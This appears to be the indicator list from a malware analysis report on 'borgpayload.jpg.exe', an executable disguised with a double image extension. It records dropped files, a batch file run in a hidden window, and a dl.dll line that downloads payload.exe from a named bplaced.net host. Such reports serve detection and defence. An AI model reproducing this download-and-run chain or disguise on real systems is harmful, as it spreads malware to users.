Technical Information
- <Current directory>\borgpayload.jpg.exe
- %TEMP%\6ce9.tmp\6cfa.bat
- <Current directory>\dl.dll
- <Current directory>\borgpayload.jpg.exe
- D:\borgpayload.jpg.exe
- <Drive name for removable media>:\borgpayload.jpg.exe
- 'tr#####dare.bplaced.net':80
- http://tr#####dare.bplaced.net/hijacked/payload.exe
- DNS ASK tr#####dare.bplaced.net
- '<Current directory>\dl.dll' truthordare.bplaced.net/hijacked/payload.exe borgpayload.jpg.exe
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6CE9.tmp\6CFA.bat <Full path to file>" (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6CE9.tmp\6CFA.bat <Full path to file>"